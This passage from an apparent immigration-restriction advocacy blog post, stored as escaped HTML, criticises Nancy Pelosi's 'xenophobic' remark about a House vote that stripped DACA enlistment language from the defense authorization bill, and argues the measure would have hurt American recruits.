That\u2019s a juvenile practice that sometimes appears on grade school playgrounds. But, unfortunately it is also often used by apologists for illegal aliens. An excellent example of this was demonstrated <a href=\"http:\/\/thehill.com\/homenews\/house\/242150-dems-hammer-gop-as-xenophobic\" target=\"_blank\">on May 14 by former House Speaker Nancy Pelosi<\/a> (D-Calif.). \u201cThis xenophobic, anti-newcomer attitude is something that is un-American.\u201d<\/p>\n<p><span style=\"line-height: 1.5em;\">She was fulminating about a <a title=\"Americans Serving their Country are Being Dismissed, Yet There\u2019s Room for Illegal Aliens in the Military?\" href=\"http:\/\/live-immigrationreform.pantheonsite.io\/2015\/05\/15\/americans-serving-their-country-are-being-dismissed-yet-theres-room-for-illegal-aliens-in-the-military\/\" target=\"_blank\">successful Republican-sponsored effort<\/a> to sidetrack a proposal supported by all House Democrats and 20 Republicans to open the door to enlistment in the U.S. military by illegal aliens granted work permits under the Obama administration\u2019s illegal and <a title=\"Federal Court Finds Napolitano and Morton DACA Directive Illegal\" href=\"http:\/\/live-immigrationreform.pantheonsite.io\/2013\/05\/01\/federal-court-finds-napolitano-and-morton-daca-directive-illegal\/\" target=\"_blank\">unconstitutional DACA<\/a> (Deferred action for Childhood Arrivals) program. If the proponents of the measure had gotten their way, it would have been a step towards getting around the current prohibition against <a title=\"Sorting Through the Laundry List of ENLIST Act Claims\" href=\"http:\/\/live-immigrationreform.pantheonsite.io\/2014\/04\/25\/sorting-through-the-laundry-list-of-enlist-act-claims\/\" target=\"_blank\">enlisting illegal aliens<\/a> and opened up a route for them to get legal permanent residence (green cards).<\/span><\/p>\n<p><span style=\"line-height: 1.5em;\">For Pelosi to term the backers of the \u00a0that stripped amnesty-promoting language from the National Defense Authorization Act \u201cun-American\u201d is patently childish rhetoric given the majority of public opinion opposes any amnesty for illegal aliens while the border remains unsecured. (See <\/span><a style=\"line-height: 1.5em;\" href=\"http:\/\/www.fairus.org\/facts\/illegal-immigration-and-amnesty-polls\">http:\/\/www.fairus.org\/facts\/illegal-immigration-and-amnesty-polls<\/a><span style=\"line-height: 1.5em;\">)<\/span><\/p>\n<p><span style=\"line-height: 1.5em;\">The effort by the amnesty-backers was not only a slap at the American public, it would also have decreased enlistment opportunities for Americans and legal residents. There has been no shortage of volunteers for military service and opportunities were already shrinking as a result of military staffing cuts.
